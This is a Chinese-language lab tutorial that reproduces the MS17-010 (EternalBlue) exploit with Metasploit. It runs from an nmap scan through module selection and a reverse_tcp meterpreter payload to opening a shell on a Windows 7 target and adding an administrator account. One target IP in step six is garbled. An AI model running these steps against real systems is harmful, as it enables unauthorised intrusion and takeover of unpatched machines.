MS17-010漏洞复现

MS17-010漏洞复现

环境配置:windows 7 (IP:192.168.228.136/24)
攻击机:kali-Linux-2022.3(IP:192.168.228.132/24)
kali-Linux-2022.3和Windows 7能够相互ping通,Windows 7靶机关闭防火墙,开启445端口(默认端口开启),Windows 7靶机不要打补丁

第一步:使用nmap命令扫描网络,查看同一网络中是否具有可攻击的主机及端口:nmap 192.168.228.0/24
在这里插入图片描述
第二步:攻击机和靶机必须处于同一网络,我们可知攻击机IP:192.168.228.132,靶机IP:192.168.228.136
使用msfconsole进入控制台
在这里插入图片描述
第三步:搜索MS17-010漏洞
在这里插入图片描述

第四步:利用auxiliary模块扫描ms17-010漏洞,查看并设置靶机IP
use 3
show options
set rhosts 192.168.228.136
在这里插入图片描述

第五步:进入exploit模块后,使用payload模块,将攻击靶机的程序装载进入即将进行的攻击中,
use 0
set payload windows/x64/meterpreter/reverse_tcp
在这里插入图片描述

第六步:设置靶机IP:set rhosts 192.168.136,使用run命令进行攻击,当出现下图是即成功
在这里插入图片描述

第七步:输入shell命令,打开靶机的cmd界面,输入chcp 65001解决乱码问题,创建新用户,并添加至管理员组,取得最高权限
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值